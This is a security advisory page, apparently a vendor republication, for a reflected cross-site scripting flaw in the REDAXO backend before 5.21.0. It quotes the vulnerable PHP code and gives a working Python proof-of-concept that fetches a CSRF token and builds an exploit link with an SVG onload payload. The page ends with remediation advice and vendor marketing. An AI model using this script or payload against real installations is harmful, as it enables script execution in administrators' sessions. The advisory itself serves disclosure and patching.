GHSA-XQ4J-G85Q-WF97

GHSA-XQ4J-G85Q-WF97 is a low-severity cross-site scripting (XSS) vulnerability in redaxo/source (composer), affecting versions < 5.21.0. It is fixed in 5.21.0.

Summary

A reflected XSS vulnerability has been identified in the REDAXO backend. The function parameter is concatenated into an API error message and rendered without HTML escaping.

Details

Root cause
User input function is injected into an exception message, then rendered by rex_view::error() which delegates to rex_view::message() without HTML escaping.

Vulnerable code (redaxo/src/core/lib/packages/api_package.php) :

$function = rex_request('function', 'string');
throw new rex_api_exception('Unknown package function "' . $function . '"!');

Sink (redaxo/src/core/lib/view.php) :

return '<div class="' . $cssClassMessage . '">' . $message . '</div>';

Source -> sink flow

  • Source: function (GET)
  • Propagation: concatenated into the exception message
  • Sink: rendered via rex_view::error() -> rex_view::message() without escaping

Authentication required: yes (backend session)

PoC - Exploit

#!/usr/bin/env python3
import re
import urllib.parse
import requests

TARGET_URL = "http://poc.local/"
BACKEND_PATH = "redaxo/index.php"

# A valid backend PHP session id (must belong to a user who can access the Packages page)
SESSION_ID = "xxxxxxxxxxxxxxxxxxxxx

https://github.com/user-attachments/assets/94093253-abd6-4380-ad46-6b748541a598

"

VERIFY_SSL = False
TIMEOUT = 15

PAYLOAD = '\\"><svg/onload=alert("Pwned")>'

def build_backend_url() -> str:
    base = TARGET_URL.rstrip('/')
    return f"{base}/{BACKEND_PATH.lstrip('/')}"


def extract_api_csrf(html_text: str) -> str:
    m = re.search(r'rex-api-call=package[^\"]+_csrf_token=([^&\"\s]+)', html_text)
    if not m:
        raise RuntimeError("CSRF token for rex_api_call=package was not found in the page HTML.")
    return m.group(1)

def set_session_cookie(session: requests.Session) -> None:
    parsed = urllib.parse.urlparse(TARGET_URL)
    if parsed.hostname:
        session.cookies.set("PHPSESSID", SESSION_ID, domain=parsed.hostname, path="/")


def main() -> None:
    backend_url = build_backend_url()

    s = requests.Session()
    set_session_cookie(s)

    # Backend session required (role with access to packages)
    r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL)
    if "rex-page-login" in r0.text or "rex_user_login" in r0.text:
        print("[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.")
        return

    r = s.get(backend_url, params={"page": "packages"}, timeout=TIMEOUT, verify=VERIFY_SSL)
    if r.status_code != 200:
        print(f"[!] Failed to access packages page (HTTP {r.status_code}).")
        return

    api_token = extract_api_csrf(r.text)

    params = {
        "page": "packages",
        "rex-api-call": "package",
        "function": PAYLOAD,
        "package": "nonexistent",
        "_csrf_token": api_token,
    }

    exploit_url = f"{backend_url}?{urllib.parse.urlencode(params)}"
    print(exploit_url)


if __name__ == "__main__":
    main()

To run the PoC you must set a valid admin account PHPSSID. The PoC will then automatically retrieve the CSRF token and generate a ready-to-use exploitation link.

Demo

https://github.com/user-attachments/assets/41d0186a-7ca0-4482-86c5-8bea6c8f6ac6

Impact

  • Confidentiality: Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim’s session.
  • Integrity: Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call.
  • Availability: Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios.

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

redaxo/source (< 5.21.0)

Security releases

redaxo/source → 5.21.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade redaxo/source to 5.21.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-XQ4J-G85Q-WF97? GHSA-XQ4J-G85Q-WF97 is a low-severity cross-site scripting (XSS) vulnerability in redaxo/source (composer), affecting versions < 5.21.0. It is fixed in 5.21.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of redaxo/source are affected by GHSA-XQ4J-G85Q-WF97? redaxo/source (composer) versions < 5.21.0 is affected.
  3. Is there a fix for GHSA-XQ4J-G85Q-WF97? Yes. GHSA-XQ4J-G85Q-WF97 is fixed in 5.21.0. Upgrade to this version or later.
  4. Is GHSA-XQ4J-G85Q-WF97 exploitable, and should I be worried? Whether GHSA-XQ4J-G85Q-WF97 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether GHSA-XQ4J-G85Q-WF97 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix GHSA-XQ4J-G85Q-WF97? Upgrade redaxo/source to 5.21.0 or later.

Other vulnerabilities in redaxo/source

CVE-2026-21857CVE-2025-66026CVE-2025-64049CVE-2025-64050CVE-2025-27412

Stop the waste.
Protect your environment with Kodem.